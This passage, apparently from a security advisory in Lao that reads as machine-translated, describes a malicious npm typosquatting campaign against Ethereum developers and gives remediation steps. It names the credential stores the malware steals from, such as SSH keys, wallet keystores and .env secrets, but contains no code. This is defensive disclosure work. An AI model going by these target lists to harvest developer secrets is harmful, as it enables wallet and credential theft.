ຖ້ານັກພັດທະນາໃຊ້ໜຶ່ງໃນຫົກແພັກເກດ ແລະ ສະພາບແວດລ້ອມຂອງເຂົາເຈົ້າກົງກັບປະຕູການເປີດໃຊ້ງານ, ໃຫ້ຖືວ່າສະຖານີເຮັດວຽກຖືກໂຈມຕີ.
ນັ້ນລວມທັງເຄື່ອງຈັກທີ່ຕິດຕັ້ງ Foundry, ກະແຈ Alchemy ຫຼື Infura ໃນສະພາບແວດລ້ອມ, ກະແຈສ່ວນຕົວ, ລະຫັດຊ່ວຍຈຳ, ຫຼື ກະແຈຕົວນຳໃຊ້.
ຄຳຕອບທີ່ແນະນຳ:
- ຕັດການເຊື່ອມຕໍ່ໂຮສອອກຈາກເຄືອຂ່າຍ.
- ຮັກສາໄວ້
node_modules, ໄຟລ໌ລັອກ, ປະຫວັດຂອງເຊວ, ແລະບັນທຶກທີ່ກ່ຽວຂ້ອງສຳລັບການກວດສອບທາງດ້ານນິຕິວິທະຍາ. - ໝຸນຄູ່ຄີ SSH ແຕ່ລະຄູ່ພາຍໃຕ້
~/.ssh/. - ໝຸນກະແຈກະເປົາເງິນສຳລັບທຸກໆບ່ອນເກັບກະແຈພາຍໃຕ້
~/.foundry,~/.ethereum, ແລະ~/.brownie. - ຍ້າຍເງິນໄປຍັງກະເປົາເງິນໃໝ່.
- ໝຸນທຸກຄວາມລັບທີ່ເກັບໄວ້ໃນ
.env*ໄຟລ໌ໃນບ່ອນເກັບມ້ຽນທີ່ນັກພັດທະນາເຮັດວຽກຢູ່. - ໝຸນຄວາມລັບຂອງສະພາບແວດລ້ອມທີ່ກົງກັບ regex ຂອງຄໍເລັກຊັນ, ລວມທັງກະແຈ AWS, ໂທເຄັນ npm, ໂທເຄັນທີ່ນຳໃຊ້, ກະແຈ API, ກະແຈສ່ວນຕົວ, ແກ່ນ, ແລະ ຕົວຊ່ວຍຈຳ.
- ກວດສອບກິດຈະກຳຂອງ cloud, npm, GitHub, ຜູ້ໃຫ້ບໍລິການ RPC, ແລະ blockchain ນັບຕັ້ງແຕ່ແພັກເກດຖືກຕິດຕັ້ງຄັ້ງທຳອິດ.
- ປັບແຕ່ງຮູບພາບພື້ນທີ່ເຮັດວຽກຄືນໃໝ່ກ່ອນທີ່ຈະນຳໃຊ້ຄືນໃໝ່.
ສິ່ງທີ່ຜູ້ປົກປ້ອງຄວນເອົາໄປ
ແຄມເປນນີ້ສະແດງໃຫ້ເຫັນວ່າການ typosquatting npm ກຳລັງພັດທະນາແນວໃດອ້ອມຮອບລະບົບນິເວດຂອງນັກພັດທະນາທີ່ມີມູນຄ່າສູງ.
ນັກສະແດງບໍ່ຕ້ອງການຄວາມອົດທົນ. ພວກເຂົາບໍ່ຕ້ອງການການປິດບັງ. ພວກເຂົາບໍ່ຕ້ອງການແມ່ນແຕ່ການປະຕິບັດເວລາຕິດຕັ້ງ.
ແທນທີ່ຈະ, ພວກເຂົາອີງໃສ່ສາມຢ່າງຄື:
- ຊື່ແພັກເກດ Web3 ທີ່ໜ້າເຊື່ອຖືໄດ້
- ການເປີດໃຊ້ງານພຽງແຕ່ໃນເຄື່ອງພັດທະນາ crypto ທີ່ແທ້ຈິງເທົ່ານັ້ນ
- ການລັກຂະໂມຍໄຟລ໌ ແລະ ຄວາມລັບໂດຍກົງທີ່ສຳຄັນທີ່ສຸດສຳລັບນັກພັດທະນາ Ethereum
ສິ່ງນັ້ນເຮັດໃຫ້ການໂຄສະນາຫາສຽງພາດໄດ້ງ່າຍໃນການສະແກນຢ່າງກວ້າງຂວາງ ແລະ ເປັນອັນຕະລາຍເມື່ອມັນຕົກຢູ່ໃນສະພາບແວດລ້ອມທີ່ເໝາະສົມ.
ສຳລັບທີມງານ Web3, ບົດຮຽນແມ່ນຈະແຈ້ງ: ປະຕິບັດຕໍ່ຊື່ການເພິ່ງພາອາໄສເປັນສ່ວນໜຶ່ງຂອງຮູບແບບໄພຂົ່ມຂູ່ຂອງທ່ານ. ແພັກເກດທີ່ເບິ່ງຄືວ່າເປັນຜູ້ຊ່ວຍທີ່ບໍ່ເປັນອັນຕະລາຍຍັງສາມາດກາຍເປັນເສັ້ນທາງທີ່ສັ້ນທີ່ສຸດໄປສູ່ການປະນີປະນອມກະເປົາເງິນໄດ້.
ລາຍງານໄປຍັງທະບຽນ npm ແລ້ວ. ພວກເຮົາຈະອັບເດດໂພສນີ້ເມື່ອບັນຊີຜູ້ເຜີຍແຜ່ ແລະ ແພັກເກດຖືກລຶບອອກ.




